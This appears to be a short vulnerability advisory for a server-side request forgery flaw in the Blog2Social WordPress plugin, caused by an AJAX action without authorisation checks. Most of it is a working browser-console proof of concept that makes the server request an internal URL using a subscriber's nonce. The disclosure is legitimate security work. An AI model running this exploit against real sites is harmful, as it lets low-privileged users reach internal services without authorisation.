The plugin does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks
Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social)
// Set this callback_url to the internal url you want the server to call
callback_url = 'http://127.0.0.1:8080/';
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';
// Don't edit below
data = new FormData();
data.append('action', 'b2s_scrape_url');
data.append('url', callback_url);
data.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());
fetch(wp_site_ajax_url, {
method: 'POST',
credentials: 'same-origin',
body: data
});